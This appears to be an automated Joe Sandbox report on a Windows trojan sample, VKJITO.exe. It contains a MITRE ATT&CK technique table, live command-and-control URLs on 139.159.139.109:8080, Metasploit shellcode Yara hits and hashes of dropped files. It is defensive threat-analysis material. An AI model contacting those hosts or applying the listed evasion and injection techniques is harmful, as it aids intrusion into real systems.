        Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

        Remote Access Functionality

        Source: Yara match; File source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 12 Process Injection | 2 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
        | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 12 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 3 System Information Discovery | SSH | Keylogging | 112 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Extra Window Memory Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
        Behavior graph (ID: 1577651; Sample: VKJITO.exe; Startdate: 18/12/2024; Architecture: WINDOWS; Score: 88)
        Signatures shown: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures
        Domains shown: time.windows.com; templatesmetadata.office.net; 3 other IPs or domains
        VKJITO.exe: started WerFault.exe, curl.exe and cmd.exe; DNS/IP node: 139.159.139.109, 49705, 8080 (HWCSNETHuaweiCloudServicedatacenterCN, China)
        WerFault.exe: dropped C:\ProgramData\Microsoft\...\Report.wer, Unicode
        curl.exe: started conhost.exe; DNS/IP nodes: ip.sb 104.26.13.31, 49703, 80 (CLOUDFLARENETUS, United States) and 127.0.0.1 (unknown)
        cmd.exe: started WINWORD.EXE and conhost.exe

        | Source | Detection | Scanner | Label | Link |
        |---|---|---|---|---|
        | VKJITO.exe | 42% | ReversingLabs | Win64.Trojan.Iphellsgate | |

        No Antivirus matches
        No Antivirus matches
        No Antivirus matches

        | Source | Detection | Scanner | Label | Link |
        |---|---|---|---|---|
        | http://139.159.139.109:8080/uz68ug | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68d( | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68dg | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68x( | 0% | Avira URL Cloud | safe | |
        | http://39.159.139.109:8080/uz68 | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68ig | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109:8080/uz68 | 0% | Avira URL Cloud | safe | |
        | http://139.159.139.109/uz68 | 0% | Avira URL Cloud | safe | |
        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|---|---|
        | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 212.229.88.4 | true | false | | high |
        | ip.sb | 104.26.13.31 | true | false | | high |
        | time.windows.com | unknown | unknown | false | | high |

        | Name | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|
        | http://139.159.139.109/uz68 | true | Avira URL Cloud: safe | unknown |
        | http://39.159.139.109:8080/uz68 | true | Avira URL Cloud: safe | unknown |
        | http://139.159.139.109:8080/uz68 | true | Avira URL Cloud: safe | unknown |
        | http://ip.sb/ | false | | high |

        | Name | Source | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|---|
        | http://139.159.139.109:8080/uz68dg | VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
        | http://139.159.139.109:8080/uz68d( | VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
        | http://upx.sf.net | Amcache.hve.12.dr | false | | high |
        | http://ip.sb/edNameSpaceh51 | curl.exe, 00000001.00000002.1364350016.00000138A0739000.00000004.00000020.00020000.00000000.sdmp | false | | high |
        | http://139.159.139.109:8080/uz68ig | VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
        | http://139.159.139.109:8080/uz68x( | VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
        | http://139.159.139.109:8080/uz68ug | VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
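        | IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
        |---|---|---|---|---|---|---|
        | 104.26.13.31 | ip.sb | United States | | 13335 | CLOUDFLARENETUS | false |
        | 139.159.139.109 | unknown | China | | 55990 | HWCSNETHuaweiCloudServicedatacenterCN | true |

        | IP |
        |---|
        | 127.0.0.1 |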
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1577651
                    Start date and time:2024-12-18 16:29:03 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:VKJITO.exe
                    Detection:MAL
                    Classification:mal88.troj.winEXE@12/239@3/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 94%
                    • Number of executed functions: 21
                    • Number of non-executed functions: 90
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 20.101.57.9, 40.81.94.65, 52.109.28.46, 52.109.89.19, 52.113.194.132, 2.16.229.162, 212.229.88.4, 52.111.236.33, 52.111.236.32, 52.111.236.34, 52.111.236.35, 23.218.208.109, 20.42.72.131, 2.17.100.210, 2.17.100.200, 104.86.110.75, 104.86.110.74, 13.107.246.63, 20.190.159.23, 172.202.163.200, 20.42.73.29
                    • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, twc.trafficmanager.net, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: VKJITO.exe
                    No simulations
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):118
                                        Entropy (8bit):3.5700810731231707
                                        Encrypted:false
                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                        MD5:573220372DA4ED487441611079B623CD
                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9003219075659693
                                        Encrypted:false
                                        SSDEEP:96:K2FMvxIi8PswAioh7JfSQXIDcQWc6zcEZcw37dqe+HbHg/KownOg3FxTYbATFwdj:l8f8PK0I3D8jovNzuiFhZ24lO8m
                                        MD5:B6857EB44385EA09A6BF34E40755BF45
                                        SHA1:F3E8B9D5F3C618883272C03257FB773EE0076A9D
                                        SHA-256:2E7CE201899A6B7182672A9244C97FBB49FDCF36491B6FE264C82B8391E8D78C
                                        SHA-512:3BF6AA7B8E19B8810A3A23F18031864CE7466581FACA42CD70067DD6D99F2F279D58E206712AB11FE8EAE127A7536B092B03D307395474675AD45852E9B3510B
                                        Malicious:true
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.9.4.1.6.7.0.6.8.1.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.9.4.1.7.5.3.4.9.2.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.7.6.6.f.f.5.-.7.b.6.1.-.4.4.0.3.-.9.6.0.d.-.2.7.c.8.e.1.a.4.1.e.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.b.9.9.c.5.d.-.1.b.9.a.-.4.8.3.c.-.8.f.4.a.-.d.c.8.f.5.c.7.5.d.4.4.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.V.K.J.I.T.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.4.-.0.0.0.1.-.0.0.1.4.-.5.b.6.f.-.e.5.b.7.6.1.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.2.0.8.1.7.2.3.0.4.2.3.4.b.c.4.2.2.a.7.d.f.4.5.b.9.1.3.f.a.9.e.0.0.0.0.0.0.0.0.!.0.0.0.0.a.e.4.3.a.1.0.d.4.6.2.f.0.9.a.a.7.b.9.4.5.b.5.b.3.7.a.a.d.9.c.0.d.1.d.f.4.b.0.1.!.V.K.J.I.T.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.1.7.:.0.4.:.5.2.:.0.
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 15:30:17 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):144158
                                        Entropy (8bit):1.3624641038153098
                                        Encrypted:false
                                        SSDEEP:768:1MUSmVKdy96i+e5Y4ppkWQuE5YFvs5gaTAAxfI/xcppAD5af:1M/WQuE5YFvsh0AxfI/xcpKD5af
                                        MD5:8ED45104A36FD2597C331128DFBAF003
                                        SHA1:FDB00517A725AF79894D3EE4510AF35AAC7CDB6A
                                        SHA-256:91FC15E429689B7E60CE64A0EBA5E9D604686D93C89C8C634FF17F54569C7815
                                        SHA-512:60A515AE24C0925B5817C64E89625A7AAFE84C10EB5C98D65D3B2D1550B2DACBE05B2EEE3A63B7D3649D0E2523762121EB63D63512EEC8D3729E3CA7A1350719
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, Author: unknown
                                        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, Author: unknown
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8758
                                        Entropy (8bit):3.708480743769043
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJIge66YNjaoihgmfmjpDl89bdJzhf0Ffm:R6lXJnj6YZaoihgmfmUdNhfp
                                        MD5:78909B369A53E736A6273D6D99A24C46
                                        SHA1:7236ADE77C93E15F27B7FAF11D6807938A632832
                                        SHA-256:E3BA956E62C7D72D0C07D4A37F1A4481146CCFBBAB4CCBDB2C07FB9D1F2D0A26
                                        SHA-512:70BECD008ADA2979FF86CF4FE780E64A69D22E3459146BD862F0D49FD84E4C0F19F634DF0816DA48BEB150B40CECF914049F5AE741000160649232BBE69025A5
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.8.0.<./.P.i.
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4661
                                        Entropy (8bit):4.492127542740119
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs0NJg771I9YuyWpW8VYoYm8M4J+diOKFMhyq859AvOxt25CTz39d:uIjf4I7zK7VkJNwhJKk+z39d
                                        MD5:358A99D9B45BB9C681BF2F483C36CDD2
                                        SHA1:F90F4E4CCF333943D97BEACED30D0F75B96EEE32
                                        SHA-256:3C628975EEFE231169ECCA762920DDD2AB035AD5A80A9556B718EA0BDBC6E326
                                        SHA-512:398E13E9BEB9F0A421E2F6570257244BC13164685877C0F9DFB1C1F350BA0E62C65BF86C1D5B85AD08B3130E7AFFCEB1A21DD8626FF44894132A2AA599CD84B1
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636872" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                        Category:dropped
                                        Size (bytes):4761
                                        Entropy (8bit):7.945585251880973
                                        Encrypted:false
                                        SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                        MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                        SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                        SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                        SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):340
                                        Entropy (8bit):3.129937848515287
                                        Encrypted:false
                                        SSDEEP:6:kKE+h5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:c+rLkPlE99SCQl2DUeXJlOA
                                        MD5:3A22E1C6062AF05737F413B0B5C8CE6E
                                        SHA1:4860236C13A198EFDE44D76113A623339E1001CD
                                        SHA-256:36CF97D18386BB3B02D9F4A523AACDFE9C9BEB9FBE3EB624A095301C0E578BD9
                                        SHA-512:8E6F645327AF0EBE457FF4BE67DA1B48E6DD757CD28685374BF8F40FEEA0A5E6FD9F5BB5DBBDEE95127AF743412B3EFC3EDD26816C259AD22350E17D5AFF2DD1
                                        Malicious:false
                                        Preview:p...... ........../.aQ..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):521377
                                        Entropy (8bit):4.9084889265453135
                                        Encrypted:false
                                        SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                        MD5:C37972CBD8748E2CA6DA205839B16444
                                        SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                        SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                        SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                        Malicious:false
                                        Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                        Category:dropped
                                        Size (bytes):773040
                                        Entropy (8bit):6.55939673749297
                                        Encrypted:false
                                        SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                        MD5:4296A064B917926682E7EED650D4A745
                                        SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                        SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                        SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2278
                                        Entropy (8bit):3.8423138297543904
                                        Encrypted:false
                                        SSDEEP:48:uiTrlKxsxxAxl9Il8uSHOtdNJ/zvv/GWCe75gid1rc:vsYAOFJDv/GNedM
                                        MD5:7893C271729148EE28A8F23ABD20C1D7
                                        SHA1:A4A2A9227551037010A3933561F76F46E050AA11
                                        SHA-256:28A7B095896F452074F1F9DDD1BC63FC65302ED5CF4565924637FF824849C787
                                        SHA-512:9BACBEDDAFDAC0A572F5847EFFFF8205E2174393B9D762EB11F2FE04CAF3853F26C4F02588C420F4E78856ACF4A99E9D9D7A9BB8AF9885A9B267E0E83B0B1663
                                        Malicious:false
                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.H.I.8.H.2.p.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.x.0.e.n.j.
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2684
                                        Entropy (8bit):3.914546331518931
                                        Encrypted:false
                                        SSDEEP:48:uiTrlKxJx/xl9Il8uCt0nevT+NJYZZ3OGOUzJ6n89oZzd/vc:mYgt0BYeyY89oZu
                                        MD5:B9CEB7AD3EFB6272DCF495CA26BFC159
                                        SHA1:82039C3C96742D771D46CF352127DAD9B8DAB3B3
                                        SHA-256:FF53AFCEEBB3E27A4306D166670A4B60F46B277B5CC174FFF64631ED101833AF
                                        SHA-512:71686BF6243CC1FD11F7843106FECF79DFB16359A2B16C636F09C3238BDDDA6508B9338761E7ED6D62964C5FF2DC07D7015383757F42460D8A724C5A258E011F
                                        Malicious:false
